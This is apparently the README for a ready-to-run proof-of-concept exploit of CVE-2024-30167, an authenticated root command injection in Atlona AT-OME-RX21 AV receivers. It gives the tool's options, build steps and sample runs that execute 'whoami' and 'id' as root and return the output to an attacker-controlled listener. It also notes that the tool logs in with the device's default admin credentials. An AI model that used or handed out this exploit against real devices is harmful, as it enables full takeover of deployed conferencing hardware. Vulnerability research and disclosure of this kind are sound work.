Disclaimer: This proof of concept is provided solely for educational and research purposes only. Do not use this code on systems you do not own or have explicit permission to test. I am not responsible for any misuse.
An authenticated command injection vulnerability exists in the time configuration interface of Atlona AT-OME-RX21 AV switcher. A user with valid credentials can inject operating system commands that execute as root, leading to full system compromise.
Atlona AT-OME-RX21 is an AV (audio/visual) receiver and scaler designed for professional video conferencing and collaboration environments. It is mostly used in conference rooms, classrooms and huddle spaces. It helps connect devices like laptops/conferencing systems to displays.
This PoC works against all firmware versions <= 1.5.1
vendor info: https://atlona.com/product/at-ome-rx21/
$ .\cve-2024-30167.exe -h
▄█████ ██ ██ ██████ ████▄ ▄██▄ ████▄ ██ ██ ████▄ ▄██▄ ▄██ ▄██▀▀▀ ██████
██ ██▄▄██ ██▄▄ ▄▄▄ ▄██▀ ██ ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██ ██ ██ ██▄▄▄ ▄██▀
▀█████ ▀██▀ ██▄▄▄▄ ███▄▄ ▀██▀ ███▄▄ ██ ▄▄▄█▀ ▀██▀ ██ ▀█▄▄█▀ ██▀
PoC by: github.com/RIZZZIOM
Usage of cve-2024-30167.exe:
-P string
listening port for command output (default "4444")
-c string
Command to execute on the target
-l string
listening host for command output
-p string
Password for authentication (default "Atlona")
-t string
Target URL (e.g: http://example.com)
-u string
Username for authentication (default "admin")
- Create a binary for your system
go build -o <OUTPUT_FILENAME>- Run the exploit against the target Atlona device
$ .\cve-2024-30167.exe -P 8000 -c 'whoami' -l 192.168.1.100 -t http://192.168.1.103:1337
▄█████ ██ ██ ██████ ████▄ ▄██▄ ████▄ ██ ██ ████▄ ▄██▄ ▄██ ▄██▀▀▀ ██████
██ ██▄▄██ ██▄▄ ▄▄▄ ▄██▀ ██ ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██ ██ ██ ██▄▄▄ ▄██▀
▀█████ ▀██▀ ██▄▄▄▄ ███▄▄ ▀██▀ ███▄▄ ██ ▄▄▄█▀ ▀██▀ ██ ▀█▄▄█▀ ██▀
PoC by: github.com/RIZZZIOM
Listening on 192.168.1.100:8000 for response...
Command Injection Successful
=====Received Response=====
root
$ .\cve-2024-30167.exe -P 8000 -c 'id' -l 192.168.1.100 -t http://192.168.1.103:1337
▄█████ ██ ██ ██████ ████▄ ▄██▄ ████▄ ██ ██ ████▄ ▄██▄ ▄██ ▄██▀▀▀ ██████
██ ██▄▄██ ██▄▄ ▄▄▄ ▄██▀ ██ ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██ ██ ██ ██▄▄▄ ▄██▀
▀█████ ▀██▀ ██▄▄▄▄ ███▄▄ ▀██▀ ███▄▄ ██ ▄▄▄█▀ ▀██▀ ██ ▀█▄▄█▀ ██▀
PoC by: github.com/RIZZZIOM
Listening on 192.168.1.100:8000 for response...
Command Injection Successful
=====Received Response=====
uid=0(root) gid=0(root) groups=0(root)
the above command uses the default credentials to log into the device.
SYNTAX:
.\cve=2024-30167.exe -P <listening_port> -c <command> -l <listener_host> -t <target_uri> -u <username> -p <password>